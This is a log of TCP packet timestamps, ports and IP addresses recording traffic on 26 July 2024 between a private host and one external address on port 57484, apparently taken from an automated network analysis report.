Jul 26, 2024 13:02:56.308012962 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.308037043 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.308053970 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.308068991 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.308094025 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:56.308171034 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:56.308209896 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.308300972 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.308449984 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:56.309910059 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.309942007 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.309973955 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.310000896 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:56.310024023 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.310081005 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:56.349900961 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.349922895 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.349941969 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.349963903 CEST	49185	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:56.349992990 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.350028992 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.350037098 CEST	49185	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:56.350064039 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.350106001 CEST	49185	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:56.350150108 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.350183010 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.350369930 CEST	49185	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:56.350681067 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.396589041 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.396624088 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.396684885 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:56.441590071 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.441642046 CEST	49185	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:56.442019939 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.650980949 CEST	49185	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:56.790488958 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.790539980 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.790597916 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.790601969 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:56.790631056 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.790663958 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.790698051 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:56.790699005 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.790738106 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:56.791559935 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.791594028 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.791626930 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.791632891 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:56.792067051 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.792114019 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:56.792117119 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.792150021 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.792202950 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:56.792897940 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.792949915 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.792980909 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.792995930 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:56.793565035 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.793647051 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:56.793648005 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.836796999 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.836838007 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.836894989 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.836929083 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.836960077 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.836994886 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.836997032 CEST	49185	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:56.837100983 CEST	49185	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:56.837112904 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.837141991 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.837191105 CEST	49185	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:56.837376118 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.837428093 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.837460041 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.837472916 CEST	49185	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:56.837491035 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.837538958 CEST	49185	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:56.877419949 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.877437115 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:56.877505064 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:56.995924950 CEST	49185	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.000900030 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.271842957 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.271869898 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.271883965 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.271910906 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.272051096 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.272066116 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.272079945 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.272113085 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.272459984 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.272507906 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.272525072 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.272537947 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.272567987 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.272969007 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.273031950 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.273046970 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.273086071 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.273118973 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.273718119 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.273772001 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.273786068 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.273802042 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.273842096 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.273895025 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.274569035 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.274617910 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.274625063 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.274635077 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.274761915 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.275141954 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.275208950 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.275223970 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.275255919 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.275305033 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.275345087 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.275985956 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.276034117 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.276050091 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.276087999 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.276112080 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.276763916 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.276809931 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.276812077 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.276827097 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.276866913 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.276885986 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.277570963 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.277617931 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.277625084 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.277633905 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.277705908 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.277749062 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.278386116 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.278400898 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.278446913 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.584639072 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.584789038 CEST	49185	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.585623026 CEST	49185	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.590471983 CEST	57484	49185	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.753859043 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.753931046 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.753962994 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.753995895 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.754023075 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.754030943 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.754064083 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.754096985 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.754105091 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.754504919 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.754573107 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.754606009 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.754628897 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.754700899 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.754734993 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.754760981 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.754767895 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.754801035 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.754857063 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.754872084 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.754936934 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.754965067 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.754981995 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.755049944 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.755078077 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.755109072 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.755121946 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.755142927 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.755171061 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.755203009 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.755225897 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.755234957 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.755266905 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.755323887 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.755331993 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.755424976 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.755455971 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.755467892 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.755491972 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.755580902 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.755614042 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.755629063 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.755665064 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.755697966 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.755740881 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.755760908 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.756087065 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.756138086 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.756170034 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.756185055 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.756289005 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.756335020 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.756340027 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.756373882 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.756418943 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.756465912 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.756530046 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.756561995 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.756577969 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.756593943 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.757770061 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.758349895 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.758440018 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.758474112 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.758518934 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.758579016 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.758610964 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.758642912 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.758677006 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.758691072 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.758758068 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.758802891 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.758806944 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.758838892 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.758871078 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.758903027 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.758914948 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.758934975 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.758968115 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.759001970 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.759011984 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.760034084 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.760096073 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.760118008 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.760149956 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.760238886 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.760272980 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.760305882 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.760339975 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.760348082 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.760373116 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.760543108 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.760555983 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.760588884 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.760622025 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.760633945 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.760653973 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.760687113 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.760714054 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.760736942 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.760747910 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.760790110 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.860569954 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.860625982 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.860660076 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.860687017 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.860692024 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.860744953 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.860776901 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.860783100 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:57.860810995 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:57.860857964 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.234782934 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.234836102 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.234886885 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.234889030 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.234921932 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.234954119 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.234970093 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.234986067 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.235018969 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.235029936 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.235053062 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.235102892 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.235136986 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.235152960 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.235172033 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.235199928 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.235249043 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.235277891 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.235310078 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.235342026 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.235349894 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.235373974 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.235464096 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.235507965 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.235583067 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.235613108 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.235644102 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.235691071 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.236027956 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.236084938 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.236113071 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.236143112 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.236155033 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.236474991 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.236529112 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.236545086 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.236572981 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.236603975 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.236615896 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.236653090 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.236680031 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.236695051 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.237809896 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.237885952 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.237935066 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.237943888 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.237983942 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.238015890 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.238046885 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.238053083 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.238080025 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.238112926 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.238126040 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.238145113 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.238178968 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.238181114 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.238416910 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.238485098 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.238529921 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.238534927 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.238567114 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.238627911 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.238673925 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.238677025 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.238706112 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.239866018 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.239901066 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.239929914 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.239950895 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.239981890 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.240014076 CEST	57484	49184	192.253.251.227	192.168.2.22
Jul 26, 2024 13:02:58.240020037 CEST	49184	57484	192.168.2.22	192.253.251.227
Jul 26, 2024 13:02:58.240048885 CEST	57484	49184	192.253.251.227	192.168.2.22
